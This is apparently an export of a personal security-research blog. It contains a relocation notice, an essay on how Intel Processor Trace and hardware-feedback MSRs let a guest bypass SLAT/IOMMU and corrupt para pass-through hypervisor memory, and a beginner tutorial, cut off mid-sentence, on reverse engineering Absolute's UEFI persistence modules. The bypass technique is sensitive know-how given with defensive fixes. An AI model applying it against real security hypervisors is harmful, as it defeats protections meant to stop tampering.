tag:blogger.com,1999:blog-29378607230341113472024-03-21T12:22:37.025-07:00Satoshi's noteSatoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.comBlogger17125tag:blogger.com,1999:blog-2937860723034111347.post-10695217877974421222023-03-20T20:28:00.001-07:002023-03-20T20:34:55.512-07:00Moving to the new blog platformI am excited to announce that I moved to <a href="https://tandasat.github.io/blog/">https://tandasat.github.io/blog/</a> for new blog posts. Stay turned for more posts there!Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-62677577107892973432021-12-23T17:52:00.003-08:002021-12-29T08:11:10.726-08:00Para pass-through hypervisors and their common design problem<div style="text-align: left;">Or, bypassing hypervisor memory protection with this one weird trick!</div><div style="text-align: left;"><br /></div><h2 style="text-align: left;">Takeaways </h2><p>It is substantially harder to protect a hypervisor from tampering by a guest when it allows the guest to access hardware capabilities on the opt-out basis. Some processor features may be abused to corrupt hypervisor memory regions from the guest even if they are protected through Second Level Address Translation (SLAT) and IOMMU. The Intel Processor Trace feature is one such example. </p><p>If the hypervisor needs to be protected from tampering by the guest, hardware access from the guest should be blocked by default and allowed only on the opt-in basis instead. </p><h2 style="text-align: left;">Para pass-through hypervisor design and implementation</h2><p>Hypervisors may be designed in a way that the guest remains capable of accessing the most of system resources. This is done when the hypervisor functions as part of the current system stack (ie, hardware, firmware, operating system, and applications) to offer additional features, instead of to run multiple instances of virtualized system stacks. For example, <a href="https://en.wikipedia.org/wiki/Blue_Pill_%28software%29" target="_blank">Blue Pill</a> was a hypervisor adding a rootkit capability to the currently running system, and Avast, Kaspersky and other vendors developed hypervisors for <strike>the same</strike> security <a href="https://github.com/tanduRE/AvastHV" target="_blank">rather</a> <a href="https://github.com/iPower/KasperskyHook" target="_blank">entertainingly</a>. </p><p>Unlike the full-fledged hypervisors like Xen, KVM/QEMU, VMware, and Hyper-V, which can create full virtualized system stacks (eg, virtual processor, chipset, peripheral devices, and firmware), those hypervisors are add-ons to the current system, and thus, there is no need to create a new fully virtualized environment. This leads to an interesting hypervisor design sometimes referred to as a <a href="https://dl.acm.org/doi/10.1145/1508293.1508311" target="_blank">para pass-through hypervisor</a>, where a hypervisor hyper-jacks the current system and intercepts only minimal activities while passing through most of them to hardware. </p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnMSfJwWXJhFrmJpBBE5ttKIFdqc4cKRXW2Gu7XkXx4z728MvMaIqhN5H9QnIdHlGBRsAwYt3OADgROziplLxFRTT8wc4li0uChtlHMb2IxJ_V8IfeVdgb9O66n_f-o2nGRUneaQr1Rrk/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="427" data-original-width="1196" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnMSfJwWXJhFrmJpBBE5ttKIFdqc4cKRXW2Gu7XkXx4z728MvMaIqhN5H9QnIdHlGBRsAwYt3OADgROziplLxFRTT8wc4li0uChtlHMb2IxJ_V8IfeVdgb9O66n_f-o2nGRUneaQr1Rrk/w640-h228/image.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Illustration of hypervisor designs</td></tr></tbody></table><p></p><p>Implementation of such a hypervisor might look like this:</p><p>When a hypervisor can be configured not to intercept system activities that are unnecessary, it does so to reduce overhead. For example, on the Intel processors, access to the Model Specific Registers (MSRs) from the guest can be configured not to cause interception (VM-exit). By doing so, the guest is free to read from and write to MSRs and use associated hardware features, which minimalizes the chances of compatibility and performance issues.</p><p>In other cases where interception cannot be disabled, the hypervisor intercepts the guest activity but repeats the same operation on behalf of the guest. The CPUID instruction, for example, always causes VM-exit on the Intel processor. However, the hypervisor executes the CPUID instruction with the same parameters as the guest attempted and returns the results to the guest. This effectively lets the guest execute and get the results from the processor as if there were no hypervisor. </p><p>This is a fairly common design and implementation for research hypervisors, as it reduces a significant amount of code that needs to be written while avoiding compatibility issues. The hypervisor cares only what it cares about. It is all fun and game. </p><p>Until one hopes to protect the hypervisor from tampering by the guest. </p><h2 style="text-align: left;">Hypervisor protection from the guest </h2><p>It is natural to think of protecting the hypervisor from the guest given that the virtualization technology allows a piece of software (ie, the hypervisor) to run on a higher privilege than the traditional kernel mode. A developer of para pass-through hypervisor-based security software will not want the malicious kernel-mode code to be able to disable, bypass, or modify the hypervisor.</p><p>Such protection is implemented by leavening SLAT and IOMMU, such as Extended Page Tables (EPT) and DMA remapping on the Intel processors. For example, DMA attempting to access physical memory where hypervisor resides or uses may be blocked by removing access permission in the IOMMU translation tables. The same goes for standard memory access by processors using SLAT. </p><h2 style="text-align: left;">SLAT and IOMMU bypass with a processor feature</h2><p>Interestingly, however, multiple processor features completely bypass translations by SLAT and IOMMU. If those features are exposed to the guest, the guest would be able to corrupt contents of the physical memory regions that were supposed to be inaccessible. </p><p>Intel Processor Trace is such an example. Intel Processor Trace is a feature to trace code execution by the processor itself and let software analyze trace logs later. The logs are stored into the physical address specified by the IA32_RTIT_OUTPUT_BASE MSR, and tracing is started by setting the bit 0 of IA32_RTIT_CTL MSR. Thus, if the guest were able to write to those two MSRs, it would be possible to corrupt hypervisor memory by setting such a physical address to the IA32_RTIT_OUTPUT_BASE MSR and staring tracing.</p><p>One might think the simplest fix would be opt-outing this feature by intercepting write to the MSRs and injecting #GP(0). That is not enough, as those two MSRs are part of the state component, which may be set with the XRSTORS instruction as well. This must be taken care of too. </p><p>Alternatively, one can set the "Intel PT uses guest physical addresses" VM-execution control to have the processor treat the address specified via the MSR as a guest physical address and go through translation with the EPT.</p><p>This is what I found in some research hypervisors like <a href="https://github.com/matsu/bitvisor" target="_blank">BitVisor</a>.</p><h2 style="text-align: left;">The design problem </h2><p>Given the previously discussed fix, now, the hypervisor is protected from tampering again. What about the hardware feedback interface that is newly added to the 12th gen Intel processor? This is a feature to let the processor give "feedback" to software by writing performance information onto the physical memory address specified by the IA32_HW_FEEDBACK_PTR MSR. Again, if the guest were able to write to the MSR, it would be possible to corrupt hypervisor memory by writing a hypervisor address to the MSR. A fix would simply be opting-out the feature by intercepting write to the MSR and injecting #GP(0). </p><p>Though at this point, one can expect that the same issue may resurface in the future as the processor features expand. Additionally, how can we be sure that there are no other hardware features that allow similar corruption? The chipset, for example, has hundreds (if not thousands) of registers that offer little-known capabilities and evolves every generation. </p><p></p>It is very challenging to keep the hypervisor protected from the guest when the hypervisor limits the hardware access from the guest only on the opt-out basis. Instead, all major hypervisors expose hardware features on the opt-in basis and emulate the rest. For example, all MSR accesses are intercepted except those that are deemed to be safe. <p></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhmAMaVpWdidVJ84-fKoIi3L9GsIFt6NqAIAyWjuerTUFSNshm9CA9lBiyltZkMDb4RCqRPT-W3Rjt4Nxx17WV46OGj4ppiWK2_YnwtsCRITINpl5RC5nab27mq7XEZxP5560iKwbuGRSbWFF-4tRs1jwOx11hBKW_kVqCBsdKghr5dUBo1kiEr9gec=s2016" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1512" data-original-width="2016" height="240" src="https://blogger.googleusercontent.com/img/a/AVvXsEhmAMaVpWdidVJ84-fKoIi3L9GsIFt6NqAIAyWjuerTUFSNshm9CA9lBiyltZkMDb4RCqRPT-W3Rjt4Nxx17WV46OGj4ppiWK2_YnwtsCRITINpl5RC5nab27mq7XEZxP5560iKwbuGRSbWFF-4tRs1jwOx11hBKW_kVqCBsdKghr5dUBo1kiEr9gec=s320" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Holiday happy cat</td></tr></tbody></table>For most para pass-through hypervisor developers, this is not going to be a pragmatic solution though, as assessing what to expose to the guest and emulating missing pieces would dramatically increase the size of the effort. <a href="https://theinvisiblethings.blogspot.com/2012/01/thoughts-on-deepsafe.html">As already pointed out 10 years ago</a>, if a hypervisor is an expansion of Blue Pill, it would be better off admitting it and not trying to pretend to be a new security boundary.<p></p><br /><p><br /></p><br />Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com0tag:blogger.com,1999:blog-2937860723034111347.post-65886532982311923322021-04-12T06:52:00.000-07:002021-04-12T06:52:28.619-07:00Reverse engineering (Absolute) UEFI modules for beginners <p>This post introduces how one can start reverse engineering
UEFI-based BIOS modules. Taking Absolute as an example, this post serves as a tutorial of BIOS module reverse engineering with free tools and approachable steps for beginners.</p><p class="MsoNormal"><o:p></o:p></p>
<p class="MsoNormal">This post is not to explain how to disable or discover issues in Absolute.</p><p class="MsoNormal">In this post, terms "BIOS", "UEFI" and "firmware" all refer to UEFI-based host firmware and are interchangeable. </p><p></p><h2>Background Story<o:p></o:p></h2><div><p class="MsoNormal">You can skip this section. <o:p></o:p></p>
<p class="MsoNormal">Last week, I got a Dell laptop with activated Absolute.</p><p class="MsoNormal"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiteF2e9UwYchmZDCovx23WJawqMeUIZLIEHa8QNqMVZia__PW-Q9Z-duN4D-iqDe1kTyXMtyaXtRncsvYc87ah_pskj7rI5OmfC7SZNVzUF1XCH9IWPzhV5xm71-miPBP2zjgJBM4RTsM/" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img alt="" data-original-height="1500" data-original-width="1500" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiteF2e9UwYchmZDCovx23WJawqMeUIZLIEHa8QNqMVZia__PW-Q9Z-duN4D-iqDe1kTyXMtyaXtRncsvYc87ah_pskj7rI5OmfC7SZNVzUF1XCH9IWPzhV5xm71-miPBP2zjgJBM4RTsM/w98-h98/image.png" width="98" /></a></p>Absolute, formally known as Computrace, is popular data and device security
software with an interesting persistent technology as explained in <a href="https://en.wikipedia.org/wiki/Absolute_Software_Corporation">Wikipedia</a>.</div><div><p></p></div><p class="MsoNormal"></p><blockquote><p class="MsoNormal"><i>Absolute's flagship product is the Absolute Platform,
formerly known as Data and Device Security (DDS). Absolute relies on patented
Persistence technology, which is embedded into the firmware of most computers,
tablets, and smartphones at the factory.[25]<o:p></o:p></i></p><p class="MsoNormal">
</p><p class="MsoNormal"><i>The Persistence module is activated once the Absolute agent
is installed. If the software client is removed from a device through flashing
the firmware, replacing the hard drive, reimaging the device, or resetting the
device back to factory settings, Persistence technology will trigger an
automatic reinstallation of the software client.[25] Persistence technology is
embedded in more than half a billion devices worldwide.</i></p></blockquote><p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal">I read multiple articles about its internals in the past
but did not know much about the modules embedded in the firmware. Out of curiosity, I started to reverse engineer it, then decided to write up the steps I took because I believed this area needed more engineers' scrutiny and tutorials for it.</p><h2>Getting a BIOS image<o:p></o:p></h2><p class="MsoNormal">There are two easy ways to get a BIOS image to analyze:
extracting from an update package or using CHIPSEC.<o:p></o:p></p><p class="MsoNormal">
</p><p class="MsoNormal">BIOS images may be extracted from BIOS update packages OEMs
publish. For example, any recent Dell's BIOS images can be extracted with a script in found in <a href="https://twitter.com/platomaniac">@platomaniac</a>'s <o:p></o:p><a href="https://github.com/platomav/BIOSUtilities">BIOSUtilities </a>repo.</p><p class="MsoNormal">As a handy sample, here is <a href="https://www.dell.com/support/home/en-ca/drivers/driversdetails?driverid=d0fh4&oscode=wt64a&productcode=xps-15-7590-laptop">the Dell BIOS image</a> we will analyze in this
post.</p><p class="MsoNormal"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0UAioYhd1BoKONIq5HGHf-eHr1GbJi9bfYqIFW030JQrtpW1Ddo7989tV15Za0DCvm6bLFZKAkZInXvG44t6BW4oRQDnM4GX_hkJ85K3L4t7ukbcdA-9_n6_an73pPKh-SKcYNXyNQoQ/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="269" data-original-width="1074" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg0UAioYhd1BoKONIq5HGHf-eHr1GbJi9bfYqIFW030JQrtpW1Ddo7989tV15Za0DCvm6bLFZKAkZInXvG44t6BW4oRQDnM4GX_hkJ85K3L4t7ukbcdA-9_n6_an73pPKh-SKcYNXyNQoQ/w640-h160/image.png" width="640" /></a></div><p class="MsoNormal">Alternatively, with <a href="https://github.com/chipsec/chipsec">CHIPSEC</a>, one can dump the BIOS image of the current system with
this command after installation if the system is supported.</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><p class="MsoNormal" style="text-align: left;">$ python chipsec_util.py spi dump rom.bin</p></blockquote><h2>Identifying Absolute's module<o:p></o:p></h2><p>UEFI modules are normally OS-agnostics. It is, however, not
the case for the modules that need to interact with OS environment to establish
OS-level persistency, for example. We can find out such peculiar modules by
searching OS-specific strings such as "System32" and
"NtOpen." Let us do this.</p><p class="MsoNormal"><o:p></o:p></p>
<p class="MsoNormal">Open the the extracted image with <a href="https://github.com/LongSoft/UEFITool">UEFITool</a> and search
"System32". This will list 821ACA26-29EA-4993-839F-597FC021708D. </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhII2l8zfAP6NOj7wvCuNJjMb3unevPuhbz9JwcX4fZNptaclCn0maigXJjR7plrOsbnQpX8ueH4jS1Ff_6pp15zsOEfLrfxajunvP3GYVwhChDvqBdFHexqF2MxfSrLBEVYwlxPYLmL5g/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="186" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhII2l8zfAP6NOj7wvCuNJjMb3unevPuhbz9JwcX4fZNptaclCn0maigXJjR7plrOsbnQpX8ueH4jS1Ff_6pp15zsOEfLrfxajunvP3GYVwhChDvqBdFHexqF2MxfSrLBEVYwlxPYLmL5g/s16000/image.png" /></a></div><o:p></o:p><p></p><p class="MsoNormal">Note that UEFI modules are identified by GUIDs and not
human-friendly names. Names may be specified but are optional and unused by the
platform software. Take 821ACA26-29EA-4993-839F-597FC021708D as an example, it
is unnamed in our image, but in other image, it is named as
"efiinstnats". The internet also suggests it may be named as
"AbsoluteAbtInstaller". <o:p></o:p></p><h2>Reverse Engineering a UEFI module<o:p></o:p></h2><div><p class="MsoNormal">As the UEFITools shows, UEFI modules are vastly in the PF
format and can be analyzed with existing tools. </p><p class="MsoNormal">To reserves engineer 821ACA26-29EA-4993-839F-597FC021708D, on UEFITool, right click the
file and extract its body. Then, install <a href="https://ghidra-sre.org/">Ghidra</a> and the <a href="https://github.com/DSecurity/efiSeek">efiSeek</a> plugin as a free option. The other popular option is IDA and <a href="https://github.com/binarly-io/efiXplorer">efiXplorer</a>, though the
free version of IDA is not usable for our scenario. </p></div><p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal">Open the extracted file
(821ACA26-29EA-4993-839F-597FC021708D) with Ghidra and make sure efiSeek is
checked for auto analysis. Ignore a warning about PDB if it appears.<o:p></o:p></p><p class="MsoNormal"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixeXLBd5LuFVtYmZvM4Rdv7p2nzYzFgTKlfIdu8zW9jRKhkONxEkYmXc4tR2z1L1KI2rSCwJELlZ4FGRuCodsovJ4_fB9JQd3HfmsmbMMycxuvlYRTMHnnTBO9sDiKF1i7dlinswvcfeA/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="333" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixeXLBd5LuFVtYmZvM4Rdv7p2nzYzFgTKlfIdu8zW9jRKhkONxEkYmXc4tR2z1L1KI2rSCwJELlZ4FGRuCodsovJ4_fB9JQd3HfmsmbMMycxuvlYRTMHnnTBO9sDiKF1i7dlinswvcfeA/s16000/image.png" /></a></div><br />Strings contained in the module is VERY interesting.<br /><p></p><p class="MsoNormal"><span face=""Calibri",sans-serif" style="font-size: 11pt; line-height: 107%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: "Yu Mincho"; mso-fareast-language: JA; mso-fareast-theme-font: minor-fareast; mso-hansi-theme-font: minor-latin;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyRWZ-c0LHNU5CoqeZoEOoMHocCLqlhgsTpGDPvpv-7RoLyY6mV6fer4nDeNSI6PuhbLaOmcwtLNcM7fJcTXFqewqDZCkadEaHRga_Ezz4W3ikcUNbx6fOr3y6JHc3pKVaq7S_gqGMLXA/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="346" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyRWZ-c0LHNU5CoqeZoEOoMHocCLqlhgsTpGDPvpv-7RoLyY6mV6fer4nDeNSI6PuhbLaOmcwtLNcM7fJcTXFqewqDZCkadEaHRga_Ezz4W3ikcUNbx6fOr3y6JHc3pKVaq7S_gqGMLXA/s16000/image.png" /></a></div><p></p><p class="MsoNormal">What on earth a UEFI module has to do with SystemRoot. Either
way, the string “Computrace” indicates this is Absolute’s component.</p><p class="MsoNormal">By peeking at functions called from the entry point, we can
find an interesting function calling <a href="https://github.com/tianocore/edk2/blob/0ecdcb6142037dd1cdd08660a2349960bcf0270a/MdePkg/Include/Protocol/AcpiTable.h#L73">InstallAcpiTable()</a>. </p><p class="MsoNormal"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIU6WWXuiAg5nSnV1m6IFqMOTxA53nShoKBnh4eVf22DRm_t_gajYCR6LvCZ_wf00PqyIdW68hpScgXCyReTBrN6uBPxW7MqX1HASDaSYB8iCgMXgnSHSHjYIabAUUtgbI2rRg6-MNQbU/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="453" data-original-width="611" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIU6WWXuiAg5nSnV1m6IFqMOTxA53nShoKBnh4eVf22DRm_t_gajYCR6LvCZ_wf00PqyIdW68hpScgXCyReTBrN6uBPxW7MqX1HASDaSYB8iCgMXgnSHSHjYIabAUUtgbI2rRg6-MNQbU/s16000/image.png" /></a></div>As we can read from
the API name it installs… an ACPI table, but what is it? With little bit of clean
up, we can find some string literal looking values are assigned to the table
variable, in particular, WPBT at the offset 0 looks interesting. <div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI2og1oPu0JQiZMLdnItelIOWgYAfwoxw9j-PIKlYwbskP8OEZnJg5n_kAberaapqY-KK4gYMKY3dxnJvDwuw9Oz8UczRnxUIuzeEQxuQWbO8jvGJUx52SRpTn4qpRURvxSi4M1idNXGQ/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="219" data-original-width="349" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhI2og1oPu0JQiZMLdnItelIOWgYAfwoxw9j-PIKlYwbskP8OEZnJg5n_kAberaapqY-KK4gYMKY3dxnJvDwuw9Oz8UczRnxUIuzeEQxuQWbO8jvGJUx52SRpTn4qpRURvxSi4M1idNXGQ/s16000/image.png" /></a></div><p class="MsoNormal">With some google, we can find the Microsoft’s document
explaining the table: <a href="https://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx">Windows Platform Binary Table (WPBT)</a> (DOCX)</p><p class="MsoTitle"><o:p></o:p></p><p class="MsoNormal">In short, this type of ACPI table lets a UEFI module instruct
Windows’ Session Manager to launch a specified executable on startup. We
can see the use of the table in the code.</p><p class="MsoNormal"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTKW_48Pq_1rUReTsFPWVvqt0N-4rvUiKHCGuuzf5MBSklabRd6FGnNisVsjyFeDA5vakWNA89ehNN59fUcOHA60Xto4_VIvzVBIPQSwkSVwWKNyPBttmTVLRACoon-Cq73912YgKb9ac/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="79" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTKW_48Pq_1rUReTsFPWVvqt0N-4rvUiKHCGuuzf5MBSklabRd6FGnNisVsjyFeDA5vakWNA89ehNN59fUcOHA60Xto4_VIvzVBIPQSwkSVwWKNyPBttmTVLRACoon-Cq73912YgKb9ac/s16000/image.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIRebgJvUpI-fkWK_yz1kFylkoaCDiibiWjVs_Xnexf7r-QVSW1C3gGuLQQiTLCJARUgxImQrBMS-C0MW5E1G2ZvdUbbIhb8hwxZdDfu8TrItrID0290dCCESY6lmdl-bpvldpGDKIEhU/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="400" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIRebgJvUpI-fkWK_yz1kFylkoaCDiibiWjVs_Xnexf7r-QVSW1C3gGuLQQiTLCJARUgxImQrBMS-C0MW5E1G2ZvdUbbIhb8hwxZdDfu8TrItrID0290dCCESY6lmdl-bpvldpGDKIEhU/s16000/image.png" /></a></div><p class="MsoNormal">Let us just verify what is being registered. The handoff
memory appears to be initialized with the data at 0x80013178, which are coming from 0x80001138 containing the MZ header.</p><p class="MsoNormal"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhHCEYbLfyEL4ZClFprgI7DpgHUIFYw9UVrHJ5Nf1IkTcyEzX-scd4ypZ9G8Dq_AD4Pu8OJhLJRR398Ppq9o-fLWC7vbBxnTeKWR1qNTDKIpcNpKinvqD8nIsiPp_ak9uD5lV7DJ9b-Rs/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="94" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhHCEYbLfyEL4ZClFprgI7DpgHUIFYw9UVrHJ5Nf1IkTcyEzX-scd4ypZ9G8Dq_AD4Pu8OJhLJRR398Ppq9o-fLWC7vbBxnTeKWR1qNTDKIpcNpKinvqD8nIsiPp_ak9uD5lV7DJ9b-Rs/s16000/image.png" /></a></div> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO-tNhvRAZyLxIuZ9RVL8iIXKWoiEQdRmMHcP2prnSwPR56TjNKiNZEsac0j2ZJitNUew2NdC1JYZypC2kajUUgiZwcnW-eonZfhAScLAHWvEv-r_1fSBWi3eJRRZmUK_eh9zCL3IA-Q8/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="52" data-original-width="350" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjO-tNhvRAZyLxIuZ9RVL8iIXKWoiEQdRmMHcP2prnSwPR56TjNKiNZEsac0j2ZJitNUew2NdC1JYZypC2kajUUgiZwcnW-eonZfhAScLAHWvEv-r_1fSBWi3eJRRZmUK_eh9zCL3IA-Q8/s16000/image.png" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYI0byMkkmNCrY7upsByJeloaZYOdSeDnJyCa9TjHXKYlnzaUtCXy1bbEFhkLbC1BE3lbXjt_Emy62Hk0ScHBMlC8ZMBWp6XW9Iq7oSYRhE5Y53v6gHiJj2RG3XxqVbapP7cxAd832IPs/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="151" data-original-width="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYI0byMkkmNCrY7upsByJeloaZYOdSeDnJyCa9TjHXKYlnzaUtCXy1bbEFhkLbC1BE3lbXjt_Emy62Hk0ScHBMlC8ZMBWp6XW9Iq7oSYRhE5Y53v6gHiJj2RG3XxqVbapP7cxAd832IPs/s16000/image.png" /></a></div><p></p><p class="MsoNormal">From here, you could investigate smss.exe to see how the program
is executed and wpbbin.exe to see the contents of the program. In this post, we are going to further
look into BIOS, however.<o:p></o:p></p><p class="MsoNormal"><o:p></o:p></p><h2 style="text-align: left;">Tracking inter-module dependencies</h2><div><p class="MsoNormal">We have understood how the module installs auto startup mechanism for Windows, but how 821ACA26-29EA-4993-839F-597FC021708D<b> </b>gets
executed? The file is an “Application” that is not automatically loaded the platform
software. </p></div><p class="MsoNormal"><span face=""Calibri",sans-serif" style="font-size: 11pt; line-height: 107%; mso-ansi-language: EN-US; mso-ascii-theme-font: minor-latin; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: AR-SA; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: "Yu Mincho"; mso-fareast-language: JA; mso-fareast-theme-font: minor-fareast; mso-hansi-theme-font: minor-latin;"></span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI_RKzkNYVCmrpJwajWlaBd7rdI-Za9snSrPnJLxOxms8BnAIvDjRLQU6WKTwbOMVJ_w-u2PrHvuX0X_m3gKogtHS1TUT207IC3wWmG8ITlexB3_EfzRwANJHw5i8R-0ndT9-qp_2U7WY/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="60" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI_RKzkNYVCmrpJwajWlaBd7rdI-Za9snSrPnJLxOxms8BnAIvDjRLQU6WKTwbOMVJ_w-u2PrHvuX0X_m3gKogtHS1TUT207IC3wWmG8ITlexB3_EfzRwANJHw5i8R-0ndT9-qp_2U7WY/s16000/image.png" /></a></div><p></p><p class="MsoNormal">The short answer: another module starts it. <o:p></o:p></p><p class="MsoNormal">Finding the parent module requires UEFI specific knowledge that starting
an application in the firmware image is done with those steps. <o:p></o:p></p><p class="MsoNormal"></p><ol style="text-align: left;"><li>Locating the application file via GUID through EFI_LOADED_IMAGE_PROTOCOL</li><li>Calling LoadImage() and StartImage()</li></ol><o:p></o:p><p></p><p class="MsoNormal">
</p><p class="MsoNormal"><o:p></o:p></p><p class="MsoNormal"><a href="https://edk2-docs.gitbook.io/edk-ii-uefi-driver-writer-s-guide/5_uefi_services/readme.2/524_loadimage_and_startimage">EDK2's UEFI Driver Writer's Guide</a> shows example code that looks about like this:</p><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: Consolas, "Courier New", monospace; font-size: 11px; line-height: 15px; white-space: pre;"><div>MEDIA_FW_VOL_FILEPATH_DEVICE_PATH devicePath;</div><div>devicePath.Header = <span style="color: #6a9955;">/* ... */</span></div><div>devicePath.FvFileName = FileGuid; <span style="color: #6a9955;">// GUID of the file to launch</span></div><div><span style="color: #6a9955;">// Open the loaded image protocol</span></div><div><span style="color: #9cdcfe;">gBS</span>-><span style="color: #dcdcaa;">OpenProtocol</span>(..., &<span style="color: #9cdcfe;">EFI_LOADED_IMAGE_PROTOCOL_GUID</span>, &<span style="color: #9cdcfe;">devicePathInterface</span>, ...);</div><div><span style="color: #6a9955;">// Resolve the path in the firmware volume</span></div><div>path = <span style="color: #dcdcaa;">AppendDevicePathNode</span>(devicePathInterface, &devicePath.Header);</div><div><span style="color: #6a9955;">// Start the file</span></div><div><span style="color: #9cdcfe;">gBS</span>-><span style="color: #dcdcaa;">LoadImage</span>(..., path, ..., &<span style="color: #9cdcfe;">NewImageHandle</span>);</div><div><span style="color: #9cdcfe;">gBS</span>-><span style="color: #dcdcaa;">StartImage</span>(NewImageHandle, ...);</div></div><p class="MsoNormal">With this knowledge, we can search the GUID of the
application (821ACA26-29EA-4993-839F-597FC021708D) and locate the parent module. </p><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYYRFR_MDsAsDXDT7A7sBs3oAZy8hSyrXpyIAv3EbTFGfNSSrCtZzJB8WN7C3uMoN3uV6eEd0M63bIz0jbj5lp5g62rHsZx7LtpWJ5e8GHHPjAJQzMB8ikRfuiQTKFyZYZ7WMinqRVJgw/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="104" data-original-width="624" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYYRFR_MDsAsDXDT7A7sBs3oAZy8hSyrXpyIAv3EbTFGfNSSrCtZzJB8WN7C3uMoN3uV6eEd0M63bIz0jbj5lp5g62rHsZx7LtpWJ5e8GHHPjAJQzMB8ikRfuiQTKFyZYZ7WMinqRVJgw/w640-h106/image.png" width="640" /></a></div></div></div><div class="separator" style="clear: both; text-align: center;"><p class="MsoNormal" style="text-align: left;">As show above, the module 8B778A74-C275-49D5-93ED-4D709A129CB1 is found and is a DXE driver, meaning it is executed automatically by the platform software.
Note that this module does not have the name in our image but other images had
it as AbtDxe and DellAbtDxeBin.<o:p></o:p></p></div><p class="MsoNormal">Open the image with Ghidra and search the GUID through
